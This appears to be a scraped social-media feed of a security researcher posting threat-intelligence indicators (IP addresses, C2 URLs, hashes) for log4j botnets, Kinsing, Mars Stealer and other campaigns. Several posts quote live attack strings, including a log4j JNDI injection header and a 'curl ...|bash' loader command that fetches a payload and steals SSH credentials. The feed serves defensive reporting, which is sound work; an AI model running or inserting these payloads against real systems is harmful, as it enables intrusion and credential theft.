Toli
@tolisec
Followers: 933 | Following: 1K | Media: 27 | Statuses: 130
Security Researcher. My tweets are my own and do not reflect the views of my employer.
United Kingdom
Joined November 2017
IoT Botnet Exploiting #CVE-2021-44228 #log4j User-Agent: ${jndi:ldap://179.43.175.101:1389/o=tomcat} The payload is JavaScript code executed in Java using ScriptEngineManager. IOCs and sample: https://t.co/kvKqdFIaDD
#microsoft just released an article related to #NorthKorean #ThreatActors
https://t.co/OL5yZTwBD4 Seems that these are active IOCs related to the ransomware group: 192.177.51.248 ccwaterfall[.]com cc: @tolisec @500mk500 @Gi7w0rm @UK_Daniel_Card @tosscoinwitcher
microsoft.com
Microsoft has identified a new North Korean threat actor, now tracked as Moonstone Sleet (formerly Storm-1789), that combines many tried-and-true techniques used by other North Korean threat actors,...
We are proud to have assisted (along with partners) in the US DoJ & FBI-led disruption of the Moobot malware botnet comprised of SOHO routers utilized by APT 28/Fancy Bear: https://t.co/RnswWqlgYo Data on infections shared in Sinkhole HTTP Events report:
justice.gov
A January 2024 court-authorized operation has neutralized a network of hundreds of small office/home office (SOHO) routers that GRU Military Unit 26165, also known as APT 28, Sofacy Group, Forest...
📢 In #FIRSTCTI22, @unixfreaxjp w/ LACERT teams will share the implementation of @FIRSTdotOrg #CTI Curriculum methods into their investigation of targeted #WebSkimming threat as takeaways for #BlueTeam
https://t.co/x3RuGQGtlI Register soon, we value your time with good sharing!
first.org
Register for #FIRSTCTI22 in Berlin, 1-3 November! Program agenda is available for viewing at https://t.co/LPXvpavDyZ. Room block offers expire soon! #cybersec #misp #threatintelligence #threatscape #cti
Follina patch (CVE-2022-30190, msdt.exe) is out. https://t.co/bWTfNHiBxW
The miners are arriving! 🤖 (CVE-2022-1388) Attacker IP: 85.106.114.175 🇹🇷 Payload: curl 202.28.229.174/ldr.sh|bash Samples: https://t.co/LWi6xDlHrO * Includes exfiltration of SSH credentials
Everybody is familiar with the value of a tool like VirusTotal for malware... Ever wanted a similar tool for analyzing _not_ malware? Check out @echotrailco - solid collection of information & stats about common binaries found on healthy systems. https://t.co/1owpa5ZqrP
Active #Mars #Stealer #Malware spread from CloudLite LLC Russia. Threat Actor keeps changing URLs. C2 Domain: http://jsdkca(.)link/518855.php hash: 6e304b4616eb9daa7da76d3c1894d5e62af10fe6dc3d6b2356518dbb1121d6b9 Seems to be a malware infection in MaaS on this C2
VirusTotal welcomes @elfdigest to the VT multi-sandbox project! https://t.co/iqHDobEGLB by @karlhiramoto
Recently deployed #Mars #Stealer #Malware C2: http://62.204.41.180/5xtELSMXvf.php Hash: 4d0b2e81d023a1704d0fb71cf3e689ec43a813c4041e6d0d5503de2732d18f15 e5e16ce47ed80d3b802a9c36f7ae408493d1e491ce83f72f253832b150aeb4bc
Would you be interested in joining our #shellcode ADVANCED workshop w/ #radare2 to study & RE how recent threats are using shellcode in their actions aimed at Win/Mac/Linux OS? This vote will decide workshop planning, your answers matter! cc: @cedoxX @trufae @radareorg #MalwareMustDie
Recent Chinese Threat Actor #Winnti panel C2: ip: 204.15.78.131:3220 (TCP) url: us\.\host.skybad\.\top Actual Payload hosted here: http://160.251.42(.)252/xghk.exe hash: c99397d66e49e2def1b17f57cd0c5fb9 #GoldDragon #ZxShell #threatintel cc: @500mk500 (;
@1ZRR4H @ankit_anubhav @malwrhunterteam @0xrb Another server used in the same campaign: 80.92.204.82 🇩🇪
@1ZRR4H @ankit_anubhav @malwrhunterteam @0xrb The malware hosting server has moved to: 195.2.81.27 🇷🇺
Active #Kinsing #cryptomining campaign targeting exposed Docker API IoCs: hxxp://185.231.153.4/d.sh 🇷🇺 scanner/loader: 95.182.120.39 🇷🇺 initial payload: https://t.co/PRQUpGfuEC kinsing bin: https://t.co/SXRoRPf8OO
An update of the same botnet, another shell-script payload: hxxp://oracle.zzhreceive.top/b2f628fff19fda999999999/dktest.sh bazaar:
bazaar.abuse.ch
Threat intel on dktest.sh (MD5 3c66f9e5b4f2104f9ca8677d0f4e6c01)
Cryptomining #Linux #botnet exploiting exposed Docker APIs: - shell-script as initial payload - uses Diamorphine and LD_PRELOAD rootkits - drops Tsunami bin with .jpg extension - looks for SSH keys and AWS creds (Team-TNT code reuse) IoCs and analysis: https://t.co/SltARQAsYE
Another large network associated with #SystemBC malware C2 (31.44.185(.)11) from Russia (WebLine LTD), more than 16000 victims infected cc: @Cryptolaemus1 @1ZRR4H @bofheaded
#Kinsing botnet exploiting #log4j IoCs: ldap/web: 178[.]20[.]40[.]227 kinsing bin: https://t.co/XbX3ZoXpv6 curl-amd64: 6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3 libsystem .so: c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a
Tsunami botnet update #log4j IoC: ldap 135.148.132.224:1389 hxxp://106.246.224.219/.l/pty3 hxxp://106.246.224.219/.l/pty4 MalwareBazaar : https://t.co/VIUOOBhfQg
bazaar.abuse.ch
pty4 has been detected as Tsunami by MalwareBazaar
This #log4j IoT botnet has now moved its MD server. New IoCs: ldap://185.246.87.50:1389/Exploit http://51.250.28.5/.l/log http://51.250.28.5/.l/pty3 http://51.250.28.5/.l/pty4 Also spotted by @goncalor